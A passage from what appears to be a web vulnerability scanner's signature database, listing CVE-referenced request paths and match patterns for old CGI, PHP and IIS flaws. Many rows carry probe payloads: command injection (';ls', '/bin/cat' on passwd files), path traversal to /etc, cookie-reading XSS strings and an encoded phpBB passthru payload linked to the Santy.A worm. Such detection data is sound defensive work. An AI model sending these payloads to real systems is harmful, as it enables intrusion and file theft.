information.\",\"\",\"\"\n\"001354\",\"CVE-2001-1045\",\"7\",\"/basilix.php3?request_id[DUMMY]=@LFI()&RequestID=DUMMY&username=sec&password=secu\",\"GET\",\"@LFI()\",\"Remote file retrieval.\",\"\",\"\"\n\"001355\",\"CVE-2004-2104\",\"23\",\"/examples/jsp/snp/snoop.jsp\",\"GET\",\"BODY:Request Information\",\"Displays information about page retrievals, including other users.\",\"\",\"\"\n\"001356\",\"CVE-2004-2104\",\"23\",\"/nsn/env.bas\",\"GET\",\"CODE:200\",\"Novell web server shows the server environment and is vulnerable to cross-site scripting\",\"\",\"\"\n\"001357\",\"CVE-2004-2104\",\"23\",\"/lcgi/lcgitest.nlm\",\"GET\",\"CODE:200\",\"Novell web server shows the server environment\",\"\",\"\"\n\"001358\",\"CVE-2004-2106\",\"2\",\"/com/\",\"GET\",\"CODE:200\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001359\",\"CVE-2004-2106\",\"2\",\"/com/novell/\",\"GET\",\"CODE:200\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001360\",\"CVE-2004-2106\",\"2\",\"/com/novell/webaccess\",\"GET\",\"CODE:200\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001361\",\"CVE-2004-1607\",\"18\",\"@CGIDIRS\",\"GET\",\"BODY:match\",\"CGI Directory found\",\"\",\"\"\n\"001362\",\"CVE-2004-2047\",\"7\",\"/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"EW FileManager for PostNuke allows arbitrary file retrieval.\",\"\",\"\"\n\"001363\",\"CVE-2004-2047\",\"7\",\"/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=hosts\",\"GET\",\"@LFI()\",\"EW FileManager for PostNuke allows arbitrary file retrieval.\",\"\",\"\"\n\"001364\",\"\",\"1\",\"@CGIDIRSccbill-local.pl?cmd=MENU\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001365\",\"\",\"1\",\"@CGIDIRSccbill-local.cgi?cmd=MENU\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001366\",\"\",\"1\",\"@CGIDIRSmastergate/search.cgi?search=0&search_on=all\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001367\",\"\",\"1\",\"@CGIDIRSBackup/add-passwd.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001368\",\"CVE-2001-0930\",\"8\",\"@CGIDIRSsendpage.pl?message=test\\;/bin/ls%20/etc;echo%20\\message\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"sendpage.pl allows command execution via the message variable.\",\"\",\"\"\n\"001369\",\"CVE-2000-1131\",\"8\",\"@CGIDIRSgbook/gbook.cgi?_MAILTO=xx;ls\",\"GET\",\"CODE:200\",\"gbook.cgi allows command execution.\",\"\",\"\"\n\"001370\",\"CVE-2001-0100\",\"8\",\"@CGIDIRSbslist.cgi?email=x;ls\",\"GET\",\"CODE:200\",\"BSList allows command execution.\",\"\",\"\"\n\"001371\",\"CVE-2001-0099\",\"8\",\"@CGIDIRSbsguest.cgi?email=x;ls\",\"GET\",\"CODE:200\",\"BSGuest allows command execution.\",\"\",\"\"\n\"001372\",\"CVE-2004-2732\",\"3\",\"@CGIDIRSnbmember.cgi?cmd=list_all_users\",\"GET\",\"BODY:OK: Listing\",\"Netbilling ndmember.cgi reveals sensitive information.\",\"\",\"\"\n\"001373\",\"CVE-2003-0240\",\"a\",\"//admin/admin.shtml\",\"GET\",\"CODE:200\",\"Axis network camera may allow admin bypass by using double-slashes before URLs.\",\"\",\"\"\n\"001374\",\"https://www.securityfocus.com/archive/1/313485\",\"70\",\"/axis-cgi/buffer/command.cgi\",\"GET\",\"CODE:200\",\"Axis WebCam 2400 may allow overwriting or creating files on the system.\",\"\",\"\"\n\"001375\",\"https://www.securityfocus.com/archive/1/313485\",\"3\",\"/support/messages\",\"GET\",\"CODE:200\",\"Axis WebCam allows retrieval of messages file (/var/log/messages).\",\"\",\"\"\n\"001376\",\"\",\"8\",\"@CGIDIRSwhere.pl?sd=ls%20/etc\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001377\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"23\",\"@CGIDIRS\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001378\",\"CVE-2005-2467\",\"4\",\"/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001379\",\"CVE-2005-2467\",\"4\",\"/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001380\",\"CVE-2005-2467\",\"4\",\"/bugs/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001381\",\"CVE-2005-2467\",\"4\",\"/bugs/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001382\",\"CVE-2005-2467\",\"4\",\"/eventum/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001383\",\"CVE-2005-2467\",\"4\",\"/eventum/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001384\",\"https://labs.detectify.com/writeups/do-you-dare-to-show-your-php-easter-egg/\",\"3\",\"/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000\",\"GET\",\"BODY:phpinfo\",\"PHP Easter Eggs reveals potentially sensitive information via HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001385\",\"https://labs.detectify.com/writeups/do-you-dare-to-show-your-php-easter-egg/\",\"3\",\"/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42\",\"GET\",\"BODY:GIF89a\",\"PHP Easter Egg reveals potentially sensitive information via HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001386\",\"https://labs.detectify.com/writeups/do-you-dare-to-show-your-php-easter-egg/\",\"3\",\"/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42\",\"GET\",\"BODY:GIF89a\",\"PHP Easter Egg reveals potentially sensitive information via HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001387\",\"https://labs.detectify.com/writeups/do-you-dare-to-show-your-php-easter-egg/\",\"3\",\"/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42\",\"GET\",\"BODY:GIF89a\",\"PHP Easter Egg reveals potentially sensitive information via HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001388\",\"CVE-2004-1315\",\"89\",\"/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001389\",\"CVE-2004-1315\",\"89\",\"/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001390\",\"CVE-2004-1315\",\"89\",\"@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001391\",\"CVE-2004-1315\",\"89\",\"@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001392\",\"CVE-2004-1315\",\"89\",\"@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001393\",\"CVE-2004-1315\",\"89\",\"/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:<DIR>\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001394\",\"CVE-2004-1315\",\"89\",\"/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001395\",\"CVE-2004-1315\",\"89\",\"/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001396\",\"CVE-2004-1315\",\"89\",\"/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001397\",\"CVE-2004-1315\",\"89\",\"@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001398\",\"CVE-2004-1315\",\"89\",\"@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001399\",\"CVE-2004-1315\",\"89\",\"@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001400\",\"CVE-2004-1315\",\"89\",\"/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"BODY:drwx\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001401\",\"CVE-1999-0067\",\"8\",\"@CGIDIRSphf?Qname=root%0Acat%20@LFI(nix,abs)%20\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001402\",\"CVE-1999-0067\",\"8\",\"@CGIDIRSphf.cgi?QALIAS=x%0a/bin/cat%20@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001403\",\"CVE-1999-0067\",\"8\",\"@CGIDIRSphf\",\"GET\",\"CODE:200\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001404\",\"https://web.archive.org/web/20030509134940/http://www.securityfocus.com/archive/1/314389\",\"0\",\"@CGIDIRSupload.cgi\",\"GET\",\"CODE:200\",\"The upload.cgi allows attackers to upload arbitrary files to the server.\",\"\",\"\"\n\"001405\",\"https://web.archive.org/web/20030509134940/http://www.securityfocus.com/archive/1/314389\",\"0\",\"/upload.cgi\",\"GET\",\"CODE:200\",\"The upload.cgi allows attackers to upload arbitrary files to the server.\",\"\",\"\"\n\"001406\",\"https://httpd.apache.org/docs/2.4/mod/mod_status.html\",\"3\",\"/server-status\",\"GET\",\"CODE:200&&BODY:Server Version\",\"The mod_status module reveals Apache information.\",\"\",\"\"\n\"001407\",\"CVE-1999-0269\",\"3\",\"/?PageServices\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled.\",\"\",\"\"\n\"001408\",\"CVE-1999-0269\",\"3\",\"/?wp-cs-dump\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled.\",\"\",\"\"\n\"001409\",\"CVE-2000-0057\",\"3\",\"/cfdocs.map\",\"GET\",\"BODY:\\.tmp\",\"Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information.\",\"\",\"\"\n\"001410\",\"CVE-2000-0237\",\"b\",\"/publisher/\",\"GET\",\"CODE:200\",\"Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet.\",\"\",\"\"\n\"001411\",\"CVE-1999-1177\",\"8\",\"@CGIDIRSnph-publish.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"001412\",\"CVE-1999-0045\",\"3\",\"@CGIDIRSnph-test-cgi\",\"GET\",\"CODE:200\",\"This CGI lets attackers get a directory listing of the CGI directory.\",\"\",\"\"\n\"001413\",\"CVE-1999-0270\",\"7\",\"/cgi-bin/pfdisplay.cgi?@LFI(nix)\",\"GET\",\"@LFI()\",\"This CGI lets attackers get a directory listing of the CGI directory.\",\"\",\"\"\n\"001414\",\"CVE-1999-0270\",\"7\",\"@CGIDIRSpfdispaly.cgi?'%0A/bin/cat%20@LFI(nix,abs)|'\",\"GET\",\"@LFI()\",\"This allows attackers to execute arbitrary commands on the host.\",\"\",\"\"\n\"001415\",\"CVE-1999-0270\",\"7\",\"@CGIDIRSpfdispaly.cgi?@LFI(nix)\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"001416\",\"CVE-1999-0270\",\"7\",\"@CGIDIRSpfdisplay.cgi?'%0A/bin/cat%20@LFI(nix,abs)|'\",\"GET\",\"@LFI()\",\"This allows attackers to execute arbitrary commands on the host.\",\"\",\"\"\n\"001417\",\"https://vulners.com/openvas/OPENVAS:10207\",\"6\",\"/counter/1/n/n/0/3/5/0/a/123.gif\",\"GET\",\"CODE:200&&HEADER:Server:.*Roxen\\/\",\"The Roxen Counter may use excessive CPU time with image requests.\",\"\",\"\"\n\"001418\",\"CVE-1999-0449\",\"6\",\"/iissamples/exair/search/search.asp\",\"GET\",\"CODE:200\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server.\",\"\",\"\"\n\"001419\",\"CVE-2001-1502\",\"7\",\"@CGIDIRSwebcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20@LFI(abs,nix)|&CODE=PHOLD\",\"GET\",\"@LFI()\",\"webcart.cgi allows remote command execution. Upgrade to the latest version.\",\"\",\"\"\n\"001420\",\"OSVDB-2091\",\"5\",\"/../webserver.ini\",\"GET\",\"BODY:Authentic=\",\"Nuca WebServer allows retrieval of the web server configuration.\",\"\",\"\"\n\"001421\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:ESS Launch\",\"Default IBM TotalStorage server found.\",\"\",\"\"\n\"001422\",\"CWE-200\",\"2\",\"/na_admin/\",\"GET\",\"BODY:Network Appliance\",\"Default Network Appliance server found.\",\"\",\"\"\n\"001423\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Celerra Web Manager\",\"Default EMC Cellera manager server is running.\",\"\",\"\"\n\"001424\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:EMC ControlCenter\",\"Default EMC ControlCenter manager server is running.\",\"\",\"\"\n\"001425\",\"CWE-200\",\"2\",\"/cpqlogin.htm\",\"GET\",\"BODY:(System Management Homepage|This is a private system)\",\"Default Compaq/HP WBEM server is running.\",\"\",\"\"\n\"001427\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:DHost HTTP Server\",\"Default Novell NDS iMonitor was found. Default account may be 'sadmin' with no password.\",\"\",\"\"\n\"001428\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:AnswerBook\",\"Default Sun Answerbook server running.\",\"\",\"\"\n\"001429\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Allaire Corporateion\",\"Default JRun 2 server running.\",\"\",\"\"\n\"001430\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Cisco IP Phone\",\"Cisco VoIP Phone default web server found.\",\"\",\"\"\n\"001431\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Jaguar CTS\",\"Default Sybase Jaguar CTS server running.\",\"\",\"\"\n\"001432\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Jrun Management Console\",\"Default JRun 3 server running.\",\"\",\"\"\n\"001433\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Lantronix\",\"Default Lantronix printer found.\",\"\",\"\"\n\"001434\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Storage Management\",\"Default IBM Tivoli Server Administration server is running.\",\"\",\"\"\n\"001435\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Welcome to the JMC\",\"Default JRun 4 server running.\",\"\",\"\"\n\"001436\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:XEROX WORKCENTRE\",\"Default Xerox WorkCentre server is running.\",\"\",\"\"\n\"001437\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:body text=\\\"#000000\\\" bgcolor=\\\"#000000\\\" style=\",\"Appears to be a default Domino 6 install.\",\"\",\"\"\n\"001438\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Domino 5\",\"Default Lotus Domino server running.\",\"\",\"\"\n\"001439\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:<TITLE>Sambar Server<\\/TITLE>\",\"Appears to be a default Sambar install.\",\"\",\"\"\n\"001441\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:\\(\\?:default Tomcat\\|instead of the website\\)\",\"Appears to be a default Apache install.\",\"\",\"\"\n\"001442\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Test Page for Apache\",\"Appears to be a default Apache install.\",\"\",\"\"\n\"001443\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:The site you were trying to reach does not currently have a default page\",\"Appears to be a default IIS install.\",\"\",\"\"\n\"001444\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Welcome to IIS 4\\.0\",\"Appears to be a default IIS 4.0 install.\",\"\",\"\"\n\"001445\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Welcome to Microsoft Windows NT 4\",\"Appears to be a default IIS install.\",\"\",\"\"\n\"001446\",\"CWE-200\",\"2\",\"/\",\"GET\",\"BODY:Web Server, Enterprise Edition 6\\.0\",\"Appears to be a default Netscape/iPlanet 6 install.\",\"\",\"\"\n\"001447\",\"CWE-200\",\"b\",\"/main_page.php\",\"GET\",\"BODY:mazu\\.css\",\"Mazu Networks Profiler or Sensor is running.\",\"\",\"\"\n\"001448\",\"CWE-200\",\"b\",\"/\",\"GET\",\"BODY:samba is configured to deny\",\"Samba-swat web server. Used to administer Samba.\",\"\",\"\"\n\"001449\",\"https://cpanel.net/\",\"b\",\"/cpanel/\",\"GET\",\"CODE:200\",\"Web-based control panel\",\"\",\"\"\n\"001450\",\"CVE-2003-0560\",\"9\",\"/shopexd.asp?catalogid='42\",\"GET\",\"BODY:catalogid='42'\",\"VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities.\",\"\",\"\"\n\"001451\",\"CVE-2003-0560\",\"9\",\"/shopping/diag_dbtest.asp\",\"GET\",\"CODE:200\",\"VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities.\",\"\",\"\"\n\"001452\",\"CVE-1999-1376\",\"3\",\"/_vti_bin/fpcount.exe/\",\"GET\",\"BODY:Empty output from CGI program\",\"The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested.\",\"\",\"\"\n\"001453\",\"CVE-2003-1088\",\"4\",\"/forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Zorum v3.4 and below are vulnerable to XSS attacks.\",\"\",\"\"\n\"001454\",\"CVE-2003-1088\",\"4\",\"/zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Zorum v3.4 and below are vulnerable to XSS attacks.\",\"\",\"\"\n\"001455\",\"CVE-1999-0930\",\"2\",\"/wwwboard/passwd.txt\",\"GET\",\"CODE:200\",\"The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.\",\"\",\"\"\n\"001456\",\"https://www.exploit-db.com/exploits/22762\",\"4\",\"/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001457\",\"https://www.exploit-db.com/exploits/22762\",\"4\",\"/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001458\",\"https://www.exploit-db.com/exploits/22762\",\"4\",\"/SPHERA/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001459\",\"https://www.exploit-db.com/exploits/22762\",\"4\",\"/SPHERA/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001460\",\"OSVDB-2617\",\"4\",\"/acart2_0/signin.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"001461\",\"CVE-2000-0169\",\"3\",\"/ows-bin/perlidlc.bat?&dir\",\"GET\",\"BODY:ows\\-bin:\",\"The Oracle web listener can be used to execute remote commands.\",\"\",\"\"\n\"001462\",\"OSVDB-2695\",\"b\",\"/photo/\",\"GET\",\"CODE:200\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001463\",\"OSVDB-2695\",\"b\",\"/photodata/\",\"GET\",\"CODE:200\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001464\",\"OSVDB-2695\",\"b\",\"@CGIDIRSphoto/\",\"GET\",\"CODE:200\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001465\",\"CVE-2000-0302\",\"2\",\"/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"BODY:This is the formatting page for webhits full highlighting\",\"All default files should be removed.\",\"\",\"\"\n\"001466\",\"CVE-2000-0302\",\"2\",\"/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"BODY:This is the formatting page for webhits summary highlighting\\.\",\"All default files should be removed.\",\"\",\"\"\n\"001467\",\"CVE-2000-0302 CVE-2000-0097 MS00-006\",\"5\",\"/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"BODY:\\&lt;html\\&gt;\",\"It is possible to retrieve the source of .asp files or view any file on the system. Install the Webhits patch.\",\"\",\"\"\n\"001468\",\"CVE-2000-0302 CVE-2000-0097 MS00-006\",\"5\",\"/\",\"GET\",\"BODY:null\\.htw\\?CiWebHitsFile=\\/default\\.asp\\%20\\&CiRestriction=none\\&CiHiliteType=Full\",\"It is possible to retrieve the source of .asp files. Install the Webhits patch.\",\"\",\"\"\n\"001470\",\"CVE-2000-0540\",\"4\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=@LFI(all)\",\"GET\",\"@LFI()\",\"The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts.\",\"\",\"\"\n\"001471\",\"CVE‑2003‑1148\",\"8\",\"@CGIDIRSinclude/new-visitor.inc.php\",\"GET\",\"CODE:200\",\"Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution.\",\"\",\"\"\n\"001472\",\"CVE-2003-1152\",\"3\",\"/%3f.jsp\",\"GET\",\"BODY:WEB\\-INF|WebTide\",\"WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.\",\"\",\"\"\n\"001474\",\"CVE-1999-1011 MS98-004 MS99-025 http://attrition.org/security/advisory/individual/rfp/rfp.9902.rds_iis\",\"8\",\"/msadc/msadcs.dll\",\"GET\",\"CODE:200&&!BODY:not authorized\",\"\",\"\",\"\"\n\"001475\",\"CVE-2003-1137\",\"7\",\"/etc/*\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system.\",\"\",\"\"\n\"001476\",\"CVE-2003-1137\",\"7\",\"/../../etc/pas*\",\"GET\",\"@LFI()\",\"Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system.\",\"\",\"\"\n\"001477\",\"OSVDB-2722\",\"7\",\"/bytehoard/index.php?infolder=../../../../../../../../../../../etc/\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.\",\"\",\"\"\n\"001478\",\"OSVDB-2723\",\"3\",\"/Search\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.\",\"\",\"\"\n\"001479\",\"CVE-2003-1140,http://musicqueue.sourceforge.net/\",\"d\",\"/musicqueue.cgi\",\"GET\",\"CODE:200\",\"Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted).\",\"\",\"\"\n\"001480\",\"CVE-2003-1140,http://musicqueue.sourceforge.net/\",\"d\",\"@CGIDIRSmusicqueue.cgi\",\"GET\",\"CODE:200\",\"Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not 